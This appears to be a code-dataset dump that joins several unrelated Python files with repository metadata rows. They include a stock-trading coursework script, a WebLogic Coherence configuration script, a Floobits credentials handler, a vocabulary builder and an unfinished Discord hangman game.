HEADER_PRICE = 'Adj Close'
HEADER_YEAR = 'Year'
HEADER_LABEL = 'Week Label'
HEADER_OPEN = 'Open'
HEADER_OVERNIGHT = 'Overnight Gain'
def get_stock(ticker, start_date, end_date, s_window, l_window):
try:
df = web.get_data_yahoo(ticker, start=start_date, end=end_date)
df[HEADER_RETURN] = df[HEADER_PRICE].pct_change()
df[HEADER_RETURN].fillna(0, inplace=True)
df[HEADER_DATE] = df.index
df[HEADER_DATE] = pd.to_datetime(df[HEADER_DATE])
df['Month'] = df[HEADER_DATE].dt.month
df['Year'] = df[HEADER_DATE].dt.year
df['Day'] = df[HEADER_DATE].dt.day
for col in [HEADER_OPEN, 'High', 'Low', 'Close', HEADER_PRICE]:
df[col] = df[col].round(2)
df['Weekday'] = df[HEADER_DATE].dt.weekday_name
df[HEADER_SHORT] = df[HEADER_PRICE].rolling(window=s_window, min_periods=1).mean()
df[HEADER_LONG] = df[HEADER_PRICE].rolling(window=l_window, min_periods=1).mean()
col_list = [HEADER_DATE, 'Year', 'Month', 'Day', 'Weekday', HEADER_OPEN,
'High', 'Low', 'Close', 'Volume', HEADER_PRICE,
HEADER_RETURN, HEADER_SHORT, HEADER_LONG]
df = df[col_list]
return df
except Exception as error:
print(error)
return None
def get_last_digit(y):
x = str(round(float(y), 2))
x_list = x.split('.')
fraction_str = x_list[1]
if len(fraction_str) == 1:
return 0
else:
return int(fraction_str[1])
def get_data_table(ticker='GS', start_date='2014-01-01', end_date='2018-12-31'):
"""
Retrieves stock data, writes it to a CSV file and returns it as a matrix. Provided to us as is by the course
Professor
:return: data table matrix
"""
# ticker = 'GS' # Goldman Sachs Group Inc
# ticker = 'GDDY' # GoDaddy
# ticker = 'GM' # General Motors
# ticker = 'GRUB' # GrubHub
# start_date = '2014-01-01'
# end_date = '2018-12-31'
s_window = 14
l_window = 50
if platform.system() == 'Windows':
home_dir = os.path.join('C:', os.path.sep, 'Users', 'jimmy_000') # MS Windows home directory
else: # Assumes Linux
home_dir = os.path.join(os.path.sep + 'home', 'jgoddard') # Linux home directory
input_dir = os.path.join(home_dir, 'src', 'git', 'CS677', 'datasets')
output_file = os.path.join(input_dir, ticker + '.csv')
if not os.path.isfile(output_file):
df = get_stock(ticker, start_date, end_date, s_window, l_window)
df.to_csv(output_file, index=False)
else:
df = pd.read_csv(output_file)
return df
def get_week(local_date):
date_format = '%Y-%m-%d'
dt = datetime.datetime.strptime(local_date, date_format)
return dt.isocalendar()[1] # get number of week in year
def label_good_weeks(good_weeks):
def get_label(local_date):
if local_date in good_weeks:
return 'green'
else:
return 'red'
return get_label
def inertia_strategy(df, r=-100):
current_balance = 100
pnl = []
for index, row in df.iterrows():
overnight_gain = row[HEADER_OVERNIGHT]
open_price = row[HEADER_OPEN]
close_price = row[HEADER_PRICE]
if overnight_gain * 100 > r: # willing to trade
if overnight_gain == 0: # do nothing
continue
elif overnight_gain < 0: # sell short
num_stocks = current_balance / open_price
pnl.append((open_price - close_price) * num_stocks)
else: # long position
num_stocks = current_balance / open_price
pnl.append((close_price - open_price) * num_stocks)
return pnl
def reverse_inertia_strategy(df, r=-100):
current_balance = 100
pnl = []
for index, row in df.iterrows():
overnight_gain = row[HEADER_OVERNIGHT]
open_price = row[HEADER_OPEN]
close_price = row[HEADER_PRICE]
if overnight_gain * 100 > r: # willing to trade
if overnight_gain == 0: # do nothing
continue
elif overnight_gain > 0: # sell short
num_stocks = current_balance / open_price
pnl.append((open_price - close_price) * num_stocks)
else: # long position
num_stocks = current_balance / open_price
pnl.append((close_price - open_price) * num_stocks)
return pnl
def get_num_trades(trades):
"""
Helper function to get the number of trades
:param trades: list of trades
:return: number of trades
"""
return len(trades)
def get_num_profitable_trades(trades):
"""
Helper function to count the number of profitable trades
:param trades: list of trades
:return: number of profitable trades
"""
return len([trade for trade in trades if trade >= 0])
def get_num_losing_trades(trades):
"""
Helper function to count the number of losing trades
:param trades: list of trades
:return: number of losing trades
"""
return len([trade for trade in trades if trade < 0])
def get_profit_per_profitable_trade(trades):
"""
Helper function to calculate the average profit per profitable trade
:param trades: list of trades
:return: mean of profitable trades
"""
return statistics.mean([trade for trade in trades if trade >= 0])
def get_loss_per_losing_trade(trades):
"""
Helper function to calculate the average loss per losing trade
:param trades: list of trades
:return: mean of losing trades
"""
return statistics.mean([trade for trade in trades if trade < 0])
def print_trade_analysis(trades):
"""
Pretty print the trades
:param trades: list of trades
:return: void
"""
print()
print('Inertia Trade Strategy Analysis')
print('Trades\t# Profitable Trades\tProfit per Profitable Trade\t# Losing Trades\tLoss per Losing Trade')
num_trades = get_num_trades(trades)
num_prof_trades = get_num_profitable_trades(trades)
prof_per_prof_trade = get_profit_per_profitable_trade(trades)
num_losing_trades = get_num_losing_trades(trades)
loss_per_losing_trade = get_loss_per_losing_trade(trades)
print('{:6}\t{:19}\t{:27.2f}\t{:15}\t{:21.2f}'.format(
num_trades, num_prof_trades, prof_per_prof_trade, num_losing_trades, loss_per_losing_trade))
gs_df = get_data_table()
gs_df[HEADER_WEEK] = gs_df[HEADER_DATE].apply(get_week)
# criteria for a good week is that the sum of the returns for each day of that week were positive:
is_good_return_by_week = gs_df[HEADER_RETURN].groupby(gs_df[HEADER_WEEK]).sum() > 0
only_good = is_good_return_by_week[is_good_return_by_week == True].index
positive_week_dates = list(only_good)
gs_df[HEADER_LABEL] = gs_df[HEADER_WEEK].apply(label_good_weeks(positive_week_dates))
# Task 1
overnight_gains = [0]
gs_df.loc[0, HEADER_OVERNIGHT] = 0
for i in range(1, len(gs_df)):
# (open - previous close) / previous close
open_price = gs_df.loc[i, HEADER_OPEN]
previous_close = gs_df.loc[i - 1, HEADER_PRICE]
gs_df.loc[i, HEADER_OVERNIGHT] = (open_price - previous_close) / previous_close
overnight_gains.append((open_price - previous_close) / previous_close)
gs_df[HEADER_OVERNIGHT] = overnight_gains
# Task 1 part a
gs_2018 = gs_df[gs_df['Year'] == 2018]
pnl = inertia_strategy(gs_2018)
print_trade_analysis(pnl)
# Inertia Trade Strategy Analysis
# Trades # Profitable Trades Profit per Profitable Trade # Losing Trades Loss per Losing Trade
# 251 44 1.06 207 -1.74
# reverse strategy
reverse_pnl = reverse_inertia_strategy(gs_2018)
print_trade_analysis(reverse_pnl)
# Task 1 part b
plt.scatter(x=gs_2018[HEADER_OVERNIGHT].values, y=gs_2018[HEADER_RETURN].values)
plt.xlabel('Overnight Return')
plt.ylabel('Daily Return')
plt.title('2018 Daily Returns vs Overnight Returns')
plt.show()
print(gs_2018[[HEADER_OVERNIGHT, HEADER_RETURN]].corr())
# Overnight Gain Return
# Overnight Gain 1.000000 0.390044
# Return 0.390044 1.000000
# Based on both the scatter plot as well as the Pearson Correlation Coefficient, there appears to be very little
# positive linear relationship between overnight returns and daily returns
# Task 1 part c
x = range(-10, 11, 1)
y = []
for r in x:
pnl = inertia_strategy(gs_2018, r)
if len(pnl) > 0:
y.append(statistics.mean(pnl))
else:
y.append(None)
x = range(-10, 11, 1)
reverse_y = []
for r in x:
reverse_pnl = reverse_inertia_strategy(gs_2018, r)
if len(reverse_pnl) > 0:
reverse_y.append(statistics.mean(reverse_pnl))
else:
reverse_y.append(None)
plt.scatter(x=x, y=reverse_y)
plt.title('Average gain per R value')
plt.xlabel('R Value')
plt.ylabel('Average gain')
plt.show()
# Task 2
tips = sns.load_dataset('tips')
tips['percentage'] = ((tips['tip'] / tips['total_bill']) * 100).round(2)
# question 1
print(tips.groupby(['time'])['tip'].mean())
# time
# Lunch 2.728088
# Dinner 3.102670
# Name: tip, dtype: float64
# question 2
print(tips.groupby(['day', 'time'])['tip'].mean())
# day time
# Thur Lunch 2.767705
# Dinner 3.000000
# Fri Lunch 2.382857
# Dinner 2.940000
# Sat Dinner 2.993103
# Sun Dinner 3.255132
# Name: tip, dtype: float64
print(tips.groupby(['day', 'time'])['percentage'].mean())
# day time
# Thur Lunch 16.129016
# Dinner 15.970000
# Fri Lunch 18.875714
# Dinner 15.892500
# Sat Dinner 15.314598
# Sun Dinner 16.689605
# Name: percentage, dtype: float64
# question 3
sns.regplot(x="total_bill", y="tip", data=tips)
plt.title('Total bill vs Tip')
plt.xlabel('Total Bill')
plt.ylabel('Tip')
plt.show()
print(tips[['total_bill', 'percentage']].corr())
# total_bill tip
# total_bill 1.000000 0.675734
# tip 0.675734 1.000000
print(tips[['tip', 'percentage']].corr())
# tip percentage
# tip 1.000000 0.342361
# percentage 0.342361 1.000000
sns.regplot(x="tip", y="percentage", data=tips)
plt.title('Tip Percentage vs Tip')
plt.xlabel('Tip')
plt.ylabel('Tip percentage')
plt.show()
sns.regplot(x="total_bill", y="percentage", data=tips)
plt.title('Total bill vs Tip Percentage')
plt.xlabel('Total Bill')
plt.ylabel('Tip Percentage')
plt.show()
print(tips[['total_bill', 'tip']].corr())
# question 4
sns.regplot(x='total_bill', y='percentage', data=tips)
plt.title('Total bill vs Tip percentage')
plt.xlabel('Total Bill')
plt.ylabel('Tip percentage')
plt.show()
print(tips[['total_bill', 'percentage']].corr())
# total_bill percentage
# total_bill 1.000000 -0.338629
# percentage -0.338629 1.000000
# question 5
print(len(tips[tips['smoker'] == 'Yes']) / len(tips) * 100)
# 38.114754098360656
# question 6
sns.regplot(x=tips.index.values, y=tips['tip'])
plt.title('Tips over time')
plt.xlabel('Row index')
plt.ylabel('Tip')
plt.show()
# question 7
sns.catplot(x='sex', col='time', kind='count', data=tips)
plt.show()
# question 8
sns.boxplot(x='smoker', y='tip', data=tips)
plt.show()
sns.boxplot(x='smoker', y='percentage', data=tips)
plt.show()
# question 9
print(tips.groupby(['day'])['tip'].mean())
# day
# Thur 2.771452
# Fri 2.734737
# Sat 2.993103
# Sun 3.255132
# Name: tip, dtype: float64
print(tips.groupby(['day'])['percentage'].mean())
# day
# Thur 16.126452
# Fri 16.991579
# Sat 15.314598
# Sun 16.689605
# Name: percentage, dtype: float64
# question 10
sns.catplot(x='smoker', col='sex', kind='count', data=tips)
plt.show()
males = tips[tips['sex'] == 'Male']
females = tips[tips['sex'] != 'Male']
male_smokers = males[males['smoker'] == 'Yes']
female_smokers = females[females['smoker'] == 'Yes']
print(len(male_smokers) / len(males))
# 0.3821656050955414
print(len(female_smokers) / len(females))
# 0.3793103448275862
| [
"jimmy.goddard@gmail.com"
] | jimmy.goddard@gmail.com |
77733aa3c3a5f4b351cd39d4466390c280141c03 | 818058887063f94360be7aeb55ef51363ec7334b | /FastFoodFast/asgi.py | 59dbe97db1d17e43073f86d458d1ec1e60243529 | [
"MIT"
] | permissive | Amwata-Albert/Fast-Food | 9521092e2eba5469f4e5f3b85bff8ee68b54d4d7 | 1a6667efb10652852877422616ff80f69c3b066a | refs/heads/master | 2023-01-19T15:55:22.377452 | 2020-11-24T14:26:18 | 2020-11-24T14:26:18 | 311,437,920 | 0 | 0 | NOASSERTION | 2020-11-24T14:26:20 | 2020-11-09T19:04:01 | Python | UTF-8 | Python | false | false | 401 | py | """
ASGI config for FastFoodFast project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'FastFoodFast.settings')
application = get_asgi_application()
| [
"albertotieno41@mail.com"
] | albertotieno41@mail.com |
8277d164b1e7040645a57ce23a1d5194130455d5 | 92768f2f4c732583d469212c7e1b00a9ab136752 | /rplugin/python/floobits/common/handlers/credentials.py | f7adcbf82b941023a6f3f28965a5fa4bff73bd2c | [
"Apache-2.0"
] | permissive | Floobits/floobits-neovim | c02e7ccfcb32c80cd1adece8b1896e3defbe120e | dbfa051e4f097dfa3f46997a2019556a62861258 | refs/heads/master | 2021-11-22T19:23:22.984948 | 2021-10-18T05:48:14 | 2021-10-18T05:48:14 | 26,030,646 | 170 | 11 | Apache-2.0 | 2021-11-03T16:41:50 | 2014-10-31T19:40:06 | Python | UTF-8 | Python | false | false | 2,387 | py | import os
import sys
import uuid
import binascii
import webbrowser
try:
from . import base
from .. import api, shared as G, utils
from ... import editor
from ..exc_fmt import str_e
from ..protocols import no_reconnect
assert api and G and utils
except (ImportError, ValueError):
import base
from floo import editor
from floo.common.protocols import no_reconnect
from floo.common.exc_fmt import str_e
from .. import api, shared as G, utils
class RequestCredentialsHandler(base.BaseHandler):
PROTOCOL = no_reconnect.NoReconnectProto
def __init__(self):
super(RequestCredentialsHandler, self).__init__()
self.token = binascii.b2a_hex(uuid.uuid4().bytes).decode('utf-8')
self.success = False
def build_protocol(self, *args):
proto = super(RequestCredentialsHandler, self).build_protocol(*args)
def on_stop():
self.emit('end', self.success)
self.stop()
proto.once('stop', on_stop)
return proto
def is_ready(self):
return False
def on_connect(self):
webbrowser.open('https://%s/dash/link_editor/%s/%s' % (self.proto.host, self.codename, self.token))
self.send({
'name': 'request_credentials',
'client': self.client,
'platform': sys.platform,
'token': self.token,
'version': G.__VERSION__
})
def _on_credentials(self, data):
s = utils.load_floorc_json()
auth = s.get('AUTH', {})
auth[self.proto.host] = data['credentials']
s['AUTH'] = auth
utils.save_floorc_json(s)
utils.reload_settings()
self.success = utils.can_auth(self.proto.host)
if not self.success:
editor.error_message('Something went wrong. See https://%s/help/floorc to complete the installation.' % self.proto.host)
api.send_error('No username or secret')
else:
p = os.path.join(G.BASE_DIR, 'welcome.md')
with open(p, 'w') as fd:
username = G.AUTH.get(self.proto.host, {}).get('username')
text = editor.LINKED_ACCOUNT_TXT.format(username=username, host=self.proto.host)
fd.write(text)
editor.open_file(p)
try:
self.stop()
except Exception as e:
print(str_e(e))
| [
"bjorn@ambientchill.com"
] | bjorn@ambientchill.com |
1a164b7d02c2408775c790313f51483c12f60fa3 | 0124528676ee3bbaec60df5d6950b408e6da37c8 | /Projects/QTPy/adafruit-circuitpython-bundle-7.x-mpy-20220601/examples/pct2075_high_temp_alert_example.py | 2ec4e88196a8c47dfe88b6d038fdaac9fc2e1030 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | land-boards/lb-boards | 8127658dc537dcfde0bb59a5018ab75c3f0087f6 | eeb98cc2003dac1924845d949f6f5bd387376568 | refs/heads/master | 2023-06-07T15:44:46.110742 | 2023-06-02T22:53:24 | 2023-06-02T22:53:24 | 4,847,305 | 10 | 12 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
import board
import adafruit_pct2075
i2c = board.I2C() # uses board.SCL and board.SDA
pct = adafruit_pct2075.PCT2075(i2c)
pct.high_temperature_threshold = 35.5
pct.temperature_hysteresis = 30.0
pct.high_temp_active_high = False
print("High temp alert active high? %s" % pct.high_temp_active_high)
# Attach an LED with the Cathode to the INT pin and Anode to 3.3V with a current limiting resistor
while True:
print("Temperature: %.2f C" % pct.temperature)
time.sleep(0.5)
| [
"doug@douglasgilliland.com"
] | doug@douglasgilliland.com |
5482b9e1a19c034e719f9d85304183ee10fb27d2 | fcd9b782b9e0f0973b1ddc45e432091e2e107f39 | /InstantiationScripts/changeSOACoherence.py | 323ed4273b40d9b92dfcef95b908ae09c7e5ac36 | [] | no_license | oktbabs/fmw_repo | 5c8baa0be8185f3846ebc3cea3a2bf07ff4eb0d3 | 3cff15b4c1e1674c038c8d1c3a6d2c7a68035afb | refs/heads/master | 2020-04-09T23:06:09.725008 | 2018-12-06T14:44:11 | 2018-12-06T14:44:11 | 160,646,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,676 | py |
#++++++++++++++++++++++++++++++++++++++++++++++
# Script Name : changeSOACoherence.py +
# Written By : Timmy Babayeju +
# From Company : Fujitsu +
# To Company : FSA +
# Description : Script retrieves the old +
# Coherence Arguments WKA Addresses for SOA & +
# updates with new Coherence WKA Addreseses +
# and Ports for servers in the Cluster +
# Arguments for the SOA cache +
#++++++++++++++++++++++++++++++++++++++++++++++
import wlstModule as wlst
import sys
import string
import traceback
from java.io import File
from java.io import FileOutputStream
f=File('/tmp/appPostLaunch/logs/changeSOACoherence.log')
fos=FileOutputStream(f)
theInterpreter.setOut(fos)
print "==>> Reading Domain Information from " + DOMAIN_HOME
readDomain(DOMAIN_HOME)
SOACACHE=1
while true:
try:
COHSOAServer=eval('SOA_WKA' + str(SOACACHE) + '_SERVER')
# databaseDS=eval('ds' + str(DataS))
try:
COHSOASrv=eval(COHSOAServer)
# COHSOAServerListAddr=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENADDR')
# COHSOAListAddr=eval(COHSOAServerListAddr)
# COHSOAServerListPort=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENPORT')
# COCACHE1=-DOSB.coherence.localhost=sd1oappdu03-osbhost1-vip.fsa.gov.uk -DOSB.coherence.localport=7890 -DOSB.coherence.wka1=sd1oappdu03-osbhost1-vip.fsa.gov.uk -DOSB.coherence.wka1.port=7890 -DOSB.coherence.wka2=sd1oappdu03-osbhost2-vip.fsa.gov.uk -DOSB.coherence.wka2.port=7890
SOACACHE1='-Xms:1536m -Xmx:1536m -Xnohup -d64 -Dtangosol.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localhost=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.localport=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
SOACACHE2='-Xms:1536m -Xmx:1536m -Xnohup -d64 -Dtangosol.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localhost=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localport=' + SOA_WKA2_SERVERLISTENPORT + ' -Dtangosol.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# SOACACHE1='-DOSB.coherence.localhost=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.localport=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# SOACACHE2='-DOSB.coherence.localhost=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.localport=' + SOA_WKA2_SERVERLISTENPORT + '-DOSB.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# URL1='jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=' + dbRACHost1 + ')(PORT=' + dbRACPort + ')))(CONNECT_DATA=(SERVICE_NAME=' + dbRACServiceName + ')(INSTANCE_NAME=' + dbRACInstanceName1+ ')))'
# URL2='jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=' + dbRACHost2 + ')(PORT=' + dbRACPort + ')))(CONNECT_DATA=(SERVICE_NAME=' + dbRACServiceName + ')(INSTANCE_NAME=' + dbRACInstanceName2+ ')))'
# databaseURL=eval('ds' + str(DataS) + '_URL')
# COHSOAServerListAddr=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENADDR')
# COHSOAListAddr=eval(COHSOAServerListAddr)
# COHSOAServerListPort=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENPORT')
# COHSOASArguments=eval('SOA_WKA' + str(SOACACHE) + '_ARGS')
# COHSOASArgs=eval(COHSOASArguments)
# databURL=eval(databaseURL)
COHSOASArguments=eval('SOA_WKA' + str(SOACACHE) + '_ARGS')
COHSOASArgs=eval(COHSOASArguments)
except NameError, ner:
print "Required parameter not specified: "
print ner
sys.exit(-1)
print "==> Updating Coherence Info " + str(SOACACHE) + ": " + COHSOAServer
print " OSB Server : " + COHSOASrv
print " OSB Listen Address 1 : " + SOA_WKA1_SERVERLISTENADDR
print " OSB Listen Port 1 : " + SOA_WKA1_SERVERLISTENPORT
print " OSB Listen Address 2 : " + SOA_WKA2_SERVERLISTENADDR
print " OSB Listen Port 2 : " + SOA_WKA2_SERVERLISTENPORT
# print "setting attributes for mbean type Server"
# a=cd('/JDBCSystemResources/' + databaseDS + '/JDBCResource/' + databaseDS + '/JDBCDriverParams/' + databaseDS)
# cd('/')
# a=cd('/JDBCSystemResource/' + databaseDS + '/JdbcResource/' + databaseDS + '/JDBCDriverParams/NO_NAME_0')
print "setting attributes for mbean type Server"
a=cd('/Servers/' + COHSOASrv + '/ServerStart/' + COHSOASrv)
print " ORIGINAL VALUE : "
print ' '
print a.getArguments()
# cmo.setUrl(dataBURL)
# a.setListenAddress(mServerAddr)
#print a.getdatabaseDS()
#cmo.getUrl()
print 'Setting the new values :'
a.setArguments(COHSOASArgs)
# a.setPasswordEncrypted(sys.argv[1])
print ' '
print " LATEST VALUE : "
print ' '
print a.getArguments()
SOACACHE += 1
except NameError:
break
print "==>> Updating the Domain <<=="
updateDomain()
closeDomain()
print "==>> " + DOMAIN_NAME + " successfully updated"
| [
"oktbabs@gmail.com"
] | oktbabs@gmail.com |
22c0984369b13c085c9a024934cf992870d0fee8 | 1595ffd5cc3ede5cb1b35b5443070fbebe884fd3 | /dataset/92_get-vocab.py | ef1f0459e4eb87e246660810b3a15bc22249edc7 | [
"Apache-2.0"
] | permissive | ewdowiak/Sicilian_Translator | dd986ac687789f12f1a8d5d5a95f1862ca814174 | 135d6224aa7e9b5d6d8ab3949d463d7e1a1452db | refs/heads/main | 2023-03-09T16:27:13.334651 | 2021-09-26T15:03:21 | 2021-09-26T15:03:21 | 172,383,110 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | #!/usr/bin/python3
## Copyright 2021 Eryk Wdowiak
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
import mxnet as mx
import gluonnlp as nlp
import re
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
min_freq=1
indir='se31_multi/data-tkn/'
otdir='se31_vocab/'
scfile = indir + 'e2m_train_v1-tkn_sc-en.sc'
enfile = indir + 'm2e_train_v1-tkn_sc-en.en'
scvcbfile = otdir + 'vocab_sc.csv'
envcbfile = otdir + 'vocab_en.csv'
def simple_tkn( src_str , tkn_dlm=' ', seq_dlm='\n'):
splt_str = re.split(tkn_dlm + '|' + seq_dlm, src_str)
return filter(None, splt_str )
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## retrieve Sicilian text
scstr = ""
with open(scfile,"r") as fh:
for line in fh:
scstr = scstr + line
## get Sicilian vocabulary
sccounter = nlp.data.count_tokens(simple_tkn(scstr))
scvocab = nlp.Vocab(sccounter,
unknown_token='<unk>' , padding_token='<pad>',
bos_token='<bos>', eos_token='<eos>',
min_freq=min_freq, max_size=None)
## counts, if you're curious
#scidx_to_counts = [sccounter[w] for w in scvocab.idx_to_token]
## open Sicilian output file
scf = open(scvcbfile,'w')
## print vocab, last word without trailing comma
for i in scvocab.idx_to_token[0:len(scvocab.idx_to_token)]:
word = i
count = sccounter[i]
scf.write( format(count) + '~' + word + "\n" )
## close Sicilian output file
scf.close()
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## retrieve English text
enstr = ""
with open(enfile,"r") as fh:
for line in fh:
enstr = enstr + line
## get English vocabulary
encounter = nlp.data.count_tokens(simple_tkn(enstr))
envocab = nlp.Vocab(encounter,
unknown_token='<unk>' , padding_token='<pad>',
bos_token='<bos>', eos_token='<eos>',
min_freq=min_freq, max_size=None)
## counts, if you're curious
#enidx_to_counts = [encounter[w] for w in envocab.idx_to_token]
## open English output file
enf = open(envcbfile,'w')
## print vocab, last word without trailing comma
for i in envocab.idx_to_token[0:len(envocab.idx_to_token)]:
word = i
count = encounter[i]
enf.write( format(count) + '~' + word + "\n" )
## close English output file
enf.close()
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
| [
"eryk@wdowiak.me"
] | eryk@wdowiak.me |
ac250d7e10667f406ab08f6c594ec3adef79bb13 | dba1606d2ea9c76861d01c2251ff45b0d4efec64 | /LeetCode/39. 组合总和.py | 3a0741cf7ebd3cfa1c1b9361720d978d438e8e42 | [] | no_license | Jack00101/coding | c502087f480d50296eb01cdbba96d2ef26960bef | 4f71a572c24af78f5e6c2006742614f868ced113 | refs/heads/master | 2022-03-02T13:52:19.946260 | 2019-11-01T04:52:48 | 2019-11-01T04:52:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | class Solution:
def combinationSum(self, candidates, target: int, sort=True):
if sort:
candidates = sorted(candidates)
results = []
for ind, i in enumerate(candidates):
if i == target:
results.append([i])
if i < target:
temp = self.combinationSum(candidates[ind:], target - i, False)
for t in temp:
t.append(i)
results.extend(temp)
return results
| [
"noreply@github.com"
] | noreply@github.com |
c77f8b71d8b80ea561f1eec9ef50aee4ebe3840e | 0ff6f65c2da3ddf495b21fb54ae07c1e5c535692 | /juegos/Ahorcado.py | c8ba2bad0792f3a9ab25fac2a0b19bc0342dcd1d | [] | no_license | ldoboga/Bot-discord | 76721ccd8472af7aa161e2159c11a0424ba120fa | 54ed1ff7652a14dbaa90d0a72e9e14b37a63ee59 | refs/heads/main | 2023-07-14T14:47:55.430149 | 2021-08-27T01:26:34 | 2021-08-27T01:26:34 | 388,254,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,907 | py | import random
def leer_archivos():
ARCHIVOS = ('bin\\Cuentos.txt', 'La araña negra - tomo 1.txt', 'Las 1000 Noches y 1 Noche')
with open(ARCHIVOS[0], 'r') as f:
lista = []
data = ''
for line in f:
data = line.rstrip('\n').lower().split()
if data == []:continue
for i in data:
lista.append(i)
return ' '.join(lista)
def quitar_tildes(texto):
VOCALES = [("a","á"),("e","é"),("i","í"),("o","ó"),("u","ú")]
for b,a in VOCALES:
texto = texto.replace(a, b)
return texto.split()
def filtrar_lista(data):
list = []
for word in data:
if len(word) >=5 and word.isalpha():
list.append(word)
return list
def crear_diccionario(lista):
dic_words = {}
for i in lista:
dic_words[i] = dic_words.setdefault(i,0) + 1
return list(dic_words.keys())
def palabras():
texto = leer_archivos()
lista = quitar_tildes(texto)
lista = filtrar_lista(lista)
dic_words = crear_diccionario(lista)
return dic_words
class Ahorcado():
def __init__(self, game_over, jugador):
self.game_over = game_over
self.jugador = jugador
self.palabra = ''
self.palabra_adivinar = ''
self.longitud = 0
self.aciertos = 0
self.desaciertos = 0
self.p_usadas = []
self.p_usadas_fallo = ''
self.LONG_MIN = 5
self.LONG_MAX = 16
def cambiar_valores(self, game_over, jugador):
self.game_over = game_over
self.jugador = jugador
def reiniciar_valores(self):
self.game_over = True
self.jugador = 'jugador'
self.palabra = ''
self.palabra_adivinar = ''
self.longitud = 0
self.aciertos = 0
self.desaciertos = 0
self.p_usadas = []
self.p_usadas_fallo = ''
self.LONG_MIN = 5
self.LONG_MAX = 16
def quien_juega(self):
return '<@' + str(self.jugador) + '> es el jugador de esta partida\n Que longitud de palabra deseas?'
def comprobar_longitud(self, long, user):
return self.game_over == False and self.jugador == user and self.palabra == '' and long >= self.LONG_MIN and long <= self.LONG_MAX
def palabras_por_longitud(self, long, lista):
lista_long = []
for i in lista:
if len(i) == long:
lista_long.append(i)
self.palabra = random.choice(lista_long)
self.palabra_adivinar = '?' * len(self.palabra)
resultado = 'Palabra a adivinar: ' + str(self.palabra_adivinar) + ' | desaciertos: ' + str(self.desaciertos) + ' | aciertos: ' + str(self.aciertos)
return resultado
def respuestas_longitud(self, long, user):
if self.game_over:
resultado = 'Debes iniciar unar partida'
elif self.jugador != user:
resultado = 'No eres el jugador de esta partida'
elif long < self.LONG_MIN or long > self.LONG_MAX:
resultado = 'La longitud no es valida. ingresa una longitud entre 5 y 16'
elif not self.game_over and self.palabra != '':
resultado = 'Ya hay una partida en juego'
return resultado
def comprobar_letra(self, letra, user):
return letra.isalpha() and self.jugador == user and not self.game_over and letra not in self.p_usadas and self.palabra != '' and len(letra) == 1
def respuesta_letra(self, letra, user):
if self.game_over:
resultado = 'Debes iniciar unar partida'
elif self.jugador != user:
resultado = 'No eres el jugador de esta partida'
elif not letra.isalpha():
resultado = 'Tenes que enviar una letra no un numero'
elif len(letra) != 1:
resultado = 'Solo puede enviar una letra'
elif letra in self.p_usadas:
resultado = 'La letra ya esta en uso'
elif self.palabra == '' and not self.game_over:
resultado = 'Debes enviar una longitud antes de enviar una letra'
return resultado
def letra_en_palabra(self, letra):
self.p_usadas.append(letra)
contador = self.palabra.count(letra)
self.palabra_adivinar = self.palabra_acierto(letra)
print(self.palabra_adivinar)
if contador == 0:
